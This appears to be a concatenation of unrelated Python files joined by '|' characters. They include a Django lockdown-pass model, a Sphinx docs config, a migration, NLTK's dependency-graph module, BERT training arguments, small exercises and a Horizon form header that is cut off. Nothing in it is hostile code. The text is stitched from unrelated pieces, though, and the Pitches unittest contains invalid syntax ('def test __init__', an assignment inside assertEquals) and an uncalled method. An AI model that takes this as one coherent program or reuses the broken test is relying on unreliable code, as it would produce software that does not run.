"""Get root logger.
Args:
log_file (str, optional): File path of log. Defaults to None.
log_level (int, optional): The level of logger.
Defaults to logging.INFO.
Returns:
:obj:`logging.Logger`: The obtained logger
"""
logger = get_logger(name='mmcap', log_file=log_file, log_level=log_level)
return logger
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Gabriel Fernandes <gabrielfernndss@gmail.com>
# Héricles Emanuel <hericles.me@gmail.com>
if __name__ == '__main__':
print('easter_egg!')
|
from django.db import models
from django.utils import timezone
category_choices = (
("Essential Services Pass", "Essential Services Pass"),
("Emergency Services Pass", "Emergency Services Pass"),
)
subcategory_choices = (
("ATM/Banking", "ATM/Banking"),
("Delivery Worker", "Delivery Worker"),
("Fruit/Vegetable Vendor","Fruit/Vegetable Vendor"),
("Govt Officials","Govt Officials"),
("Grocery Vendor","Grocery Vendor"),
("Milk Vendor","Milk Vendor"),
("Health Worker","Health Worker"),
("IT/Tele Communication","IT/Tele Communication"),
("Municipal Services","Municipal Services"),
("Power/Electricity","Power/Electricity"),
("Sanitation","Sanitation"),
("Businessman","Businessman"),
)
# Create your models here.
class PassModel(models.Model):
district=models.CharField(max_length=20,null=True)
name=models.CharField(max_length=200,null=True)
email=models.CharField(max_length=200,null=True)
vehiclenumber=models.CharField(max_length=200,null=True)
phonenumber=models.CharField(max_length=10,null=True)
aadharcardnumber=models.CharField(max_length=12,null=True)
address=models.CharField(max_length=200,null=True)
reason=models.CharField(max_length=200,null=True)
issuedate=models.DateTimeField(default=timezone.now)
passcategory=models.CharField(max_length=30,choices = category_choices)
subcategory=models.CharField(max_length=30,choices = subcategory_choices)
attachphoto=models.ImageField(upload_to='profile_pics')
attachidproof=models.ImageField(upload_to='id_proof')
uniquenumber=models.CharField(max_length=10000,default=201301)
checked=models.BooleanField(default=0)
|
# -*- coding: utf-8 -*-
import doctest
from datetime import date
import scippnexus
html_show_sourcelink = True
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
'sphinx.ext.napoleon',
'sphinx_autodoc_typehints',
'sphinx_copybutton',
'nbsphinx',
]
autodoc_type_aliases = {
'VariableLike': 'VariableLike',
'MetaDataMap': 'MetaDataMap',
'array_like': 'array_like',
}
rst_epilog = f"""
.. |SCIPP_RELEASE_MONTH| replace:: {date.today().strftime("%B %Y")}
.. |SCIPP_VERSION| replace:: {scippnexus.__version__}
""" # noqa: E501
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('https://numpy.org/doc/stable/', None),
'scipp': ('https://scipp.github.io/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/', None),
'xarray': ('https://xarray.pydata.org/en/stable/', None)
}
# autodocs includes everything, even irrelevant API internals. autosummary
# looks more suitable in the long run when the API grows.
# For a nice example see how xarray handles its API documentation.
autosummary_generate = True
napoleon_google_docstring = False
napoleon_numpy_docstring = True
napoleon_use_param = True
napoleon_use_rtype = False
napoleon_preprocess_types = True
napoleon_type_aliases = {
# objects without namespace: scipp
"DataArray": "~scipp.DataArray",
"Dataset": "~scipp.Dataset",
"Variable": "~scipp.Variable",
# objects without namespace: numpy
"ndarray": "~numpy.ndarray",
}
typehints_defaults = 'comma'
typehints_use_rtype = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
html_sourcelink_suffix = '' # Avoid .ipynb.txt extensions in sources
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'scippnexus'
copyright = u'2022 Scipp contributors'
author = u'Scipp contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u''
# The full version, including alpha/beta/rc tags.
release = u''
warning_is_error = True
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '**.ipynb_checkpoints']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_book_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"logo_only": True,
"repository_url": "https://github.com/scipp/scippnexus",
"repository_branch": "main",
"path_to_docs": "docs",
"use_repository_button": True,
"use_issues_button": True,
"use_edit_page_button": True,
"show_toc_level": 2, # Show subheadings in secondary sidebar
}
html_logo = "_static/logo.png"
html_favicon = "_static/favicon.ico"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'scippnexusdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'scipp.tex', u'scipp Documentation', u'Simon Heybrock', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, 'scipp', u'scipp Documentation', [author], 1)]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'scipp', u'scipp Documentation', author, 'scipp',
'One line description of project.', 'Miscellaneous'),
]
# -- Options for Matplotlib in notebooks ----------------------------------
nbsphinx_execute_arguments = [
"--Session.metadata=scipp_docs_build=True",
]
# -- Options for doctest --------------------------------------------------
doctest_global_setup = '''
import numpy as np
import scipp as sc
'''
# Using normalize whitespace because many __str__ functions in scipp produce
# extraneous empty lines and it would look strange to include them in the docs.
doctest_default_flags = doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL | \
doctest.DONT_ACCEPT_TRUE_FOR_1 | \
doctest.NORMALIZE_WHITESPACE
# -- Options for linkcheck ------------------------------------------------
linkcheck_ignore = [
# Specific lines in Github blobs cannot be found by linkcheck.
r'https?://github\.com/.*?/blob/[a-f0-9]+/.+?#',
]
|
# Generated by Django 2.2 on 2019-04-18 13:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("images", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="image",
name="thumbnail",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="container",
to="images.ImageFile",
),
),
]
|
import unittest
from app.main.models import Pitches
from app import db
class PitchesModelTest(unittest.TestCase):
def setUp(self):
self.new_pitch=Pitches(pitch='new',comment='I love darkness', category='sports',user_id = 123)
def tearDown(self):
Pitches.query.delete()
def test __init__(self):
self.assertEquals(self.new_pitch.pitch,'new')
self.assertEquals(self.new_pitch.comment,'I love darkness')
self.assertEquals(self.new_pitch.category='sports')
self.assertEquals(self.new_pitch.user_id, 123)
def test_save_pitch(self):
self.new_pitch.save_pitch()
self.assertTrue(len(Pitches.query.all())>0)
def test_get_pitch_by_id(self):
self.new_pitch.save_pitch
got_pitch = Pitches.get_pitch(12345)
self.assertTrue(len(got_pitch) == 1)
|
string = input()
string_length = len(string)
print(string_length)
string = input()
if len(string) < 5:
print("Ошибка! Введите больше пяти символов!")
string = input()
if not string:
print("Ошибка! Введите хоть что-нибудь!")
string = input()
if len(string) == 0:
print("Ошибка! Введите хоть что-нибудь!")
|
# Natural Language Toolkit: Dependency Grammars
#
# Copyright (C) 2001-2021 NLTK Project
# Author: Jason Narad <jason.narad@gmail.com>
# Steven Bird <stevenbird1@gmail.com> (modifications)
#
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
#
"""
Tools for reading and writing dependency trees.
The input is assumed to be in Malt-TAB format
(http://stp.lingfil.uu.se/~nivre/research/MaltXML.html).
"""
from collections import defaultdict
from itertools import chain
from pprint import pformat
import subprocess
import warnings
from nltk.tree import Tree
#################################################################
# DependencyGraph Class
#################################################################
class DependencyGraph:
"""
A container for the nodes and labelled edges of a dependency structure.
"""
def __init__(
self,
tree_str=None,
cell_extractor=None,
zero_based=False,
cell_separator=None,
top_relation_label="ROOT",
):
"""Dependency graph.
We place a dummy `TOP` node with the index 0, since the root node is
often assigned 0 as its head. This also means that the indexing of the
nodes corresponds directly to the Malt-TAB format, which starts at 1.
If zero-based is True, then Malt-TAB-like input with node numbers
starting at 0 and the root node assigned -1 (as produced by, e.g.,
zpar).
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
identified, for examlple, `ROOT`, `null` or `TOP`.
"""
self.nodes = defaultdict(
lambda: {
"address": None,
"word": None,
"lemma": None,
"ctag": None,
"tag": None,
"feats": None,
"head": None,
"deps": defaultdict(list),
"rel": None,
}
)
self.nodes[0].update({"ctag": "TOP", "tag": "TOP", "address": 0})
self.root = None
if tree_str:
self._parse(
tree_str,
cell_extractor=cell_extractor,
zero_based=zero_based,
cell_separator=cell_separator,
top_relation_label=top_relation_label,
)
def remove_by_address(self, address):
"""
Removes the node with the given address. References
to this node in others will still exist.
"""
del self.nodes[address]
def redirect_arcs(self, originals, redirect):
"""
Redirects arcs to any of the nodes in the originals list
to the redirect node address.
"""
for node in self.nodes.values():
new_deps = []
for dep in node["deps"]:
if dep in originals:
new_deps.append(redirect)
else:
new_deps.append(dep)
node["deps"] = new_deps
def add_arc(self, head_address, mod_address):
"""
Adds an arc from the node specified by head_address to the
node specified by the mod address.
"""
relation = self.nodes[mod_address]["rel"]
self.nodes[head_address]["deps"].setdefault(relation, [])
self.nodes[head_address]["deps"][relation].append(mod_address)
# self.nodes[head_address]['deps'].append(mod_address)
def connect_graph(self):
"""
Fully connects all non-root nodes. All nodes are set to be dependents
of the root node.
"""
for node1 in self.nodes.values():
for node2 in self.nodes.values():
if node1["address"] != node2["address"] and node2["rel"] != "TOP":
relation = node2["rel"]
node1["deps"].setdefault(relation, [])
node1["deps"][relation].append(node2["address"])
# node1['deps'].append(node2['address'])
def get_by_address(self, node_address):
"""Return the node with the given address."""
return self.nodes[node_address]
def contains_address(self, node_address):
"""
Returns true if the graph contains a node with the given node
address, false otherwise.
"""
return node_address in self.nodes
def to_dot(self):
"""Return a dot representation suitable for using with Graphviz.
>>> dg = DependencyGraph(
... 'John N 2\\n'
... 'loves V 0\\n'
... 'Mary N 2'
... )
>>> print(dg.to_dot())
digraph G{
edge [dir=forward]
node [shape=plaintext]
<BLANKLINE>
0 [label="0 (None)"]
0 -> 2 [label="ROOT"]
1 [label="1 (John)"]
2 [label="2 (loves)"]
2 -> 1 [label=""]
2 -> 3 [label=""]
3 [label="3 (Mary)"]
}
"""
# Start the digraph specification
s = "digraph G{\n"
s += "edge [dir=forward]\n"
s += "node [shape=plaintext]\n"
# Draw the remaining nodes
for node in sorted(self.nodes.values(), key=lambda v: v["address"]):
s += '\n%s [label="%s (%s)"]' % (
node["address"],
node["address"],
node["word"],
)
for rel, deps in node["deps"].items():
for dep in deps:
if rel is not None:
s += '\n%s -> %s [label="%s"]' % (node["address"], dep, rel)
else:
s += "\n%s -> %s " % (node["address"], dep)
s += "\n}"
return s
def _repr_svg_(self):
"""Show SVG representation of the transducer (IPython magic).
>>> dg = DependencyGraph(
... 'John N 2\\n'
... 'loves V 0\\n'
... 'Mary N 2'
... )
>>> dg._repr_svg_().split('\\n')[0]
'<?xml version="1.0" encoding="UTF-8" standalone="no"?>'
"""
dot_string = self.to_dot()
try:
process = subprocess.Popen(
["dot", "-Tsvg"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
except OSError as e:
raise Exception("Cannot find the dot binary from Graphviz package") from e
out, err = process.communicate(dot_string)
if err:
raise Exception(
"Cannot create svg representation by running dot from string: {}"
"".format(dot_string)
)
return out
def __str__(self):
return pformat(self.nodes)
def __repr__(self):
return "<DependencyGraph with {0} nodes>".format(len(self.nodes))
@staticmethod
def load(
filename, zero_based=False, cell_separator=None, top_relation_label="ROOT"
):
"""
:param filename: a name of a file in Malt-TAB format
:param zero_based: nodes in the input file are numbered starting from 0
rather than 1 (as produced by, e.g., zpar)
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
identified, for examlple, `ROOT`, `null` or `TOP`.
:return: a list of DependencyGraphs
"""
with open(filename) as infile:
return [
DependencyGraph(
tree_str,
zero_based=zero_based,
cell_separator=cell_separator,
top_relation_label=top_relation_label,
)
for tree_str in infile.read().split("\n\n")
]
def left_children(self, node_index):
"""
Returns the number of left children under the node specified
by the given address.
"""
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c < index)
def right_children(self, node_index):
"""
Returns the number of right children under the node specified
by the given address.
"""
children = chain.from_iterable(self.nodes[node_index]["deps"].values())
index = self.nodes[node_index]["address"]
return sum(1 for c in children if c > index)
def add_node(self, node):
if not self.contains_address(node["address"]):
self.nodes[node["address"]].update(node)
def _parse(
self,
input_,
cell_extractor=None,
zero_based=False,
cell_separator=None,
top_relation_label="ROOT",
):
"""Parse a sentence.
:param extractor: a function that given a tuple of cells returns a
7-tuple, where the values are ``word, lemma, ctag, tag, feats, head,
rel``.
:param str cell_separator: the cell separator. If not provided, cells
are split by whitespace.
:param str top_relation_label: the label by which the top relation is
identified, for examlple, `ROOT`, `null` or `TOP`.
"""
def extract_3_cells(cells, index):
word, tag, head = cells
return index, word, word, tag, tag, "", head, ""
def extract_4_cells(cells, index):
word, tag, head, rel = cells
return index, word, word, tag, tag, "", head, rel
def extract_7_cells(cells, index):
line_index, word, lemma, tag, _, head, rel = cells
try:
index = int(line_index)
except ValueError:
# index can't be parsed as an integer, use default
pass
return index, word, lemma, tag, tag, "", head, rel
def extract_10_cells(cells, index):
line_index, word, lemma, ctag, tag, feats, head, rel, _, _ = cells
try:
index = int(line_index)
except ValueError:
# index can't be parsed as an integer, use default
pass
return index, word, lemma, ctag, tag, feats, head, rel
extractors = {
3: extract_3_cells,
4: extract_4_cells,
7: extract_7_cells,
10: extract_10_cells,
}
if isinstance(input_, str):
input_ = (line for line in input_.split("\n"))
lines = (l.rstrip() for l in input_)
lines = (l for l in lines if l)
cell_number = None
for index, line in enumerate(lines, start=1):
cells = line.split(cell_separator)
if cell_number is None:
cell_number = len(cells)
else:
assert cell_number == len(cells)
if cell_extractor is None:
try:
cell_extractor = extractors[cell_number]
except KeyError as e:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(cell_number)
) from e
try:
index, word, lemma, ctag, tag, feats, head, rel = cell_extractor(
cells, index
)
except (TypeError, ValueError):
# cell_extractor doesn't take 2 arguments or doesn't return 8
# values; assume the cell_extractor is an older external
# extractor and doesn't accept or return an index.
word, lemma, ctag, tag, feats, head, rel = cell_extractor(cells)
if head == "_":
continue
head = int(head)
if zero_based:
head += 1
self.nodes[index].update(
{
"address": index,
"word": word,
"lemma": lemma,
"ctag": ctag,
"tag": tag,
"feats": feats,
"head": head,
"rel": rel,
}
)
# Make sure that the fake root node has labeled dependencies.
if (cell_number == 3) and (head == 0):
rel = top_relation_label
self.nodes[head]["deps"][rel].append(index)
if self.nodes[0]["deps"][top_relation_label]:
root_address = self.nodes[0]["deps"][top_relation_label][0]
self.root = self.nodes[root_address]
self.top_relation_label = top_relation_label
else:
warnings.warn(
"The graph doesn't contain a node " "that depends on the root element."
)
def _word(self, node, filter=True):
w = node["word"]
if filter:
if w != ",":
return w
return w
def _tree(self, i):
""" Turn dependency graphs into NLTK trees.
:param int i: index of a node
:return: either a word (if the indexed node is a leaf) or a ``Tree``.
"""
node = self.get_by_address(i)
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
if deps:
return Tree(word, [self._tree(dep) for dep in deps])
else:
return word
def tree(self):
"""
Starting with the ``root`` node, build a dependency tree using the NLTK
``Tree`` constructor. Dependency labels are omitted.
"""
node = self.root
word = node["word"]
deps = sorted(chain.from_iterable(node["deps"].values()))
return Tree(word, [self._tree(dep) for dep in deps])
def triples(self, node=None):
"""
Extract dependency triples of the form:
((head word, head tag), rel, (dep word, dep tag))
"""
if not node:
node = self.root
head = (node["word"], node["ctag"])
for i in sorted(chain.from_iterable(node["deps"].values())):
dep = self.get_by_address(i)
yield (head, dep["rel"], (dep["word"], dep["ctag"]))
for triple in self.triples(node=dep):
yield triple
def _hd(self, i):
try:
return self.nodes[i]["head"]
except IndexError:
return None
def _rel(self, i):
try:
return self.nodes[i]["rel"]
except IndexError:
return None
# what's the return type? Boolean or list?
def contains_cycle(self):
"""Check whether there are cycles.
>>> dg = DependencyGraph(treebank_data)
>>> dg.contains_cycle()
False
>>> cyclic_dg = DependencyGraph()
>>> top = {'word': None, 'deps': [1], 'rel': 'TOP', 'address': 0}
>>> child1 = {'word': None, 'deps': [2], 'rel': 'NTOP', 'address': 1}
>>> child2 = {'word': None, 'deps': [4], 'rel': 'NTOP', 'address': 2}
>>> child3 = {'word': None, 'deps': [1], 'rel': 'NTOP', 'address': 3}
>>> child4 = {'word': None, 'deps': [3], 'rel': 'NTOP', 'address': 4}
>>> cyclic_dg.nodes = {
... 0: top,
... 1: child1,
... 2: child2,
... 3: child3,
... 4: child4,
... }
>>> cyclic_dg.root = top
>>> cyclic_dg.contains_cycle()
[3, 1, 2, 4]
"""
distances = {}
for node in self.nodes.values():
for dep in node["deps"]:
key = tuple([node["address"], dep])
distances[key] = 1
for _ in self.nodes:
new_entries = {}
for pair1 in distances:
for pair2 in distances:
if pair1[1] == pair2[0]:
key = tuple([pair1[0], pair2[1]])
new_entries[key] = distances[pair1] + distances[pair2]
for pair in new_entries:
distances[pair] = new_entries[pair]
if pair[0] == pair[1]:
path = self.get_cycle_path(self.get_by_address(pair[0]), pair[0])
return path
return False # return []?
def get_cycle_path(self, curr_node, goal_node_index):
for dep in curr_node["deps"]:
if dep == goal_node_index:
return [curr_node["address"]]
for dep in curr_node["deps"]:
path = self.get_cycle_path(self.get_by_address(dep), goal_node_index)
if len(path) > 0:
path.insert(0, curr_node["address"])
return path
return []
def to_conll(self, style):
"""
The dependency graph in CoNLL format.
:param style: the style to use for the format (3, 4, 10 columns)
:type style: int
:rtype: str
"""
if style == 3:
template = "{word}\t{tag}\t{head}\n"
elif style == 4:
template = "{word}\t{tag}\t{head}\t{rel}\n"
elif style == 10:
template = (
"{i}\t{word}\t{lemma}\t{ctag}\t{tag}\t{feats}\t{head}\t{rel}\t_\t_\n"
)
else:
raise ValueError(
"Number of tab-delimited fields ({0}) not supported by "
"CoNLL(10) or Malt-Tab(4) format".format(style)
)
return "".join(
template.format(i=i, **node)
for i, node in sorted(self.nodes.items())
if node["tag"] != "TOP"
)
def nx_graph(self):
"""Convert the data in a ``nodelist`` into a networkx labeled directed graph."""
import networkx
nx_nodelist = list(range(1, len(self.nodes)))
nx_edgelist = [
(n, self._hd(n), self._rel(n)) for n in nx_nodelist if self._hd(n)
]
self.nx_labels = {}
for n in nx_nodelist:
self.nx_labels[n] = self.nodes[n]["word"]
g = networkx.MultiDiGraph()
g.add_nodes_from(nx_nodelist)
g.add_edges_from(nx_edgelist)
return g
class DependencyGraphError(Exception):
"""Dependency graph exception."""
def demo():
malt_demo()
conll_demo()
conll_file_demo()
cycle_finding_demo()
def malt_demo(nx=False):
"""
A demonstration of the result of reading a dependency
version of the first sentence of the Penn Treebank.
"""
dg = DependencyGraph(
"""Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
)
tree = dg.tree()
tree.pprint()
if nx:
# currently doesn't work
import networkx
from matplotlib import pylab
g = dg.nx_graph()
g.info()
pos = networkx.spring_layout(g, dim=1)
networkx.draw_networkx_nodes(g, pos, node_size=50)
# networkx.draw_networkx_edges(g, pos, edge_color='k', width=8)
networkx.draw_networkx_labels(g, pos, dg.nx_labels)
pylab.xticks([])
pylab.yticks([])
pylab.savefig("tree.png")
pylab.show()
def conll_demo():
"""
A demonstration of how to read a string representation of
a CoNLL format dependency tree.
"""
dg = DependencyGraph(conll_data1)
tree = dg.tree()
tree.pprint()
print(dg)
print(dg.to_conll(4))
def conll_file_demo():
print("Mass conll_read demo...")
graphs = [DependencyGraph(entry) for entry in conll_data2.split("\n\n") if entry]
for graph in graphs:
tree = graph.tree()
print("\n")
tree.pprint()
def cycle_finding_demo():
dg = DependencyGraph(treebank_data)
print(dg.contains_cycle())
cyclic_dg = DependencyGraph()
cyclic_dg.add_node({"word": None, "deps": [1], "rel": "TOP", "address": 0})
cyclic_dg.add_node({"word": None, "deps": [2], "rel": "NTOP", "address": 1})
cyclic_dg.add_node({"word": None, "deps": [4], "rel": "NTOP", "address": 2})
cyclic_dg.add_node({"word": None, "deps": [1], "rel": "NTOP", "address": 3})
cyclic_dg.add_node({"word": None, "deps": [3], "rel": "NTOP", "address": 4})
print(cyclic_dg.contains_cycle())
treebank_data = """Pierre NNP 2 NMOD
Vinken NNP 8 SUB
, , 2 P
61 CD 5 NMOD
years NNS 6 AMOD
old JJ 2 NMOD
, , 2 P
will MD 0 ROOT
join VB 8 VC
the DT 11 NMOD
board NN 9 OBJ
as IN 9 VMOD
a DT 15 NMOD
nonexecutive JJ 15 NMOD
director NN 12 PMOD
Nov. NNP 9 VMOD
29 CD 16 NMOD
. . 9 VMOD
"""
conll_data1 = """
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
"""
conll_data2 = """1 Cathy Cathy N N eigen|ev|neut 2 su _ _
2 zag zie V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 hen hen Pron Pron per|3|mv|datofacc 2 obj1 _ _
4 wild wild Adj Adj attr|stell|onverv 5 mod _ _
5 zwaaien zwaai N N soort|mv|neut 2 vc _ _
6 . . Punc Punc punt 5 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 had heb V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 met met Prep Prep voor 8 mod _ _
4 haar haar Pron Pron bez|3|ev|neut|attr 5 det _ _
5 moeder moeder N N soort|ev|neut 3 obj1 _ _
6 kunnen kan V V hulp|ott|1of2of3|mv 2 vc _ _
7 gaan ga V V hulp|inf 6 vc _ _
8 winkelen winkel V V intrans|inf 11 cnj _ _
9 , , Punc Punc komma 8 punct _ _
10 zwemmen zwem V V intrans|inf 11 cnj _ _
11 of of Conj Conj neven 7 vc _ _
12 terrassen terras N N soort|mv|neut 11 cnj _ _
13 . . Punc Punc punt 12 punct _ _
1 Dat dat Pron Pron aanw|neut|attr 2 det _ _
2 werkwoord werkwoord N N soort|ev|neut 6 obj1 _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 ze ze Pron Pron per|3|evofmv|nom 6 su _ _
5 zelf zelf Pron Pron aanw|neut|attr|wzelf 3 predm _ _
6 uitgevonden vind V V trans|verldw|onverv 3 vc _ _
7 . . Punc Punc punt 6 punct _ _
1 Het het Pron Pron onbep|neut|zelfst 2 su _ _
2 hoorde hoor V V trans|ovt|1of2of3|ev 0 ROOT _ _
3 bij bij Prep Prep voor 2 ld _ _
4 de de Art Art bep|zijdofmv|neut 6 det _ _
5 warme warm Adj Adj attr|stell|vervneut 6 mod _ _
6 zomerdag zomerdag N N soort|ev|neut 3 obj1 _ _
7 die die Pron Pron betr|neut|zelfst 6 mod _ _
8 ze ze Pron Pron per|3|evofmv|nom 12 su _ _
9 ginds ginds Adv Adv gew|aanw 12 mod _ _
10 achter achter Adv Adv gew|geenfunc|stell|onverv 12 svp _ _
11 had heb V V hulp|ovt|1of2of3|ev 7 body _ _
12 gelaten laat V V trans|verldw|onverv 11 vc _ _
13 . . Punc Punc punt 12 punct _ _
1 Ze ze Pron Pron per|3|evofmv|nom 2 su _ _
2 hadden heb V V trans|ovt|1of2of3|mv 0 ROOT _ _
3 languit languit Adv Adv gew|geenfunc|stell|onverv 11 mod _ _
4 naast naast Prep Prep voor 11 mod _ _
5 elkaar elkaar Pron Pron rec|neut 4 obj1 _ _
6 op op Prep Prep voor 11 ld _ _
7 de de Art Art bep|zijdofmv|neut 8 det _ _
8 strandstoelen strandstoel N N soort|mv|neut 6 obj1 _ _
9 kunnen kan V V hulp|inf 2 vc _ _
10 gaan ga V V hulp|inf 9 vc _ _
11 liggen lig V V intrans|inf 10 vc _ _
12 . . Punc Punc punt 11 punct _ _
1 Zij zij Pron Pron per|3|evofmv|nom 2 su _ _
2 zou zal V V hulp|ovt|1of2of3|ev 7 cnj _ _
3 mams mams N N soort|ev|neut 4 det _ _
4 rug rug N N soort|ev|neut 5 obj1 _ _
5 ingewreven wrijf V V trans|verldw|onverv 6 vc _ _
6 hebben heb V V hulp|inf 2 vc _ _
7 en en Conj Conj neven 0 ROOT _ _
8 mam mam V V trans|ovt|1of2of3|ev 7 cnj _ _
9 de de Art Art bep|zijdofmv|neut 10 det _ _
10 hare hare Pron Pron bez|3|ev|neut|attr 8 obj1 _ _
11 . . Punc Punc punt 10 punct _ _
1 Of of Conj Conj onder|metfin 0 ROOT _ _
2 ze ze Pron Pron per|3|evofmv|nom 3 su _ _
3 had heb V V hulp|ovt|1of2of3|ev 0 ROOT _ _
4 gewoon gewoon Adj Adj adv|stell|onverv 10 mod _ _
5 met met Prep Prep voor 10 mod _ _
6 haar haar Pron Pron bez|3|ev|neut|attr 7 det _ _
7 vriendinnen vriendin N N soort|mv|neut 5 obj1 _ _
8 rond rond Adv Adv deelv 10 svp _ _
9 kunnen kan V V hulp|inf 3 vc _ _
10 slenteren slenter V V intrans|inf 9 vc _ _
11 in in Prep Prep voor 10 mod _ _
12 de de Art Art bep|zijdofmv|neut 13 det _ _
13 buurt buurt N N soort|ev|neut 11 obj1 _ _
14 van van Prep Prep voor 13 mod _ _
15 Trafalgar_Square Trafalgar_Square MWU N_N eigen|ev|neut_eigen|ev|neut 14 obj1 _ _
16 . . Punc Punc punt 15 punct _ _
"""
if __name__ == "__main__":
demo()
|
import os, sys
sys.path.append("C:\\BERTVision\\code\\torch")
import torch
import models.args
def get_args():
# retreive the general models.args and attach them here
parser = models.args.get_args()
# set search specific args
parser.add_argument('--model',
type=str,
default='MSR',
required=True)
parser.add_argument('--checkpoint',
type=str,
default='bert-base-uncased',
required=True,
help='A HuggingFace checkpoint e.g., bert-base-uncased')
parser.add_argument('--num-labels',
default=2,
type=int)
parser.add_argument('--max-seq-length',
default=86,
type=int,
help='Tokenization max length')
parser.add_argument('--save-path',
type=str,
default=os.path.join('model_checkpoints'))
parser.add_argument('--log-path',
type=str,
default=os.path.join('model_logs'))
parser.add_argument('--warmup-proportion',
default=0.1,
type=float,
help='Proportion of training to perform linear learning rate warmup for')
parser.add_argument('--batch-size',
type=int,
default=16,
help='input batch size for training (default: 16)')
parser.add_argument('--lr',
type=float,
default=1e-5,
help='learning rate (default: 1e-5)')
parser.add_argument('--num-workers',
type=int,
default=0,
help='Number of CPU cores (default: 0)')
parser.add_argument('--shard',
type=float,
default=0.10,
help='Percentage of training set to sample from')
args = parser.parse_args()
return args
#
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django import shortcuts
from django.utils.translation import ugettext as _
from novaclient import exceptions as novaclient_exceptions
from horizon import api
from horizon import forms
LOG = logging.getLogger(__name__)
class ReleaseFloatingIp(forms.SelfHandlingForm):
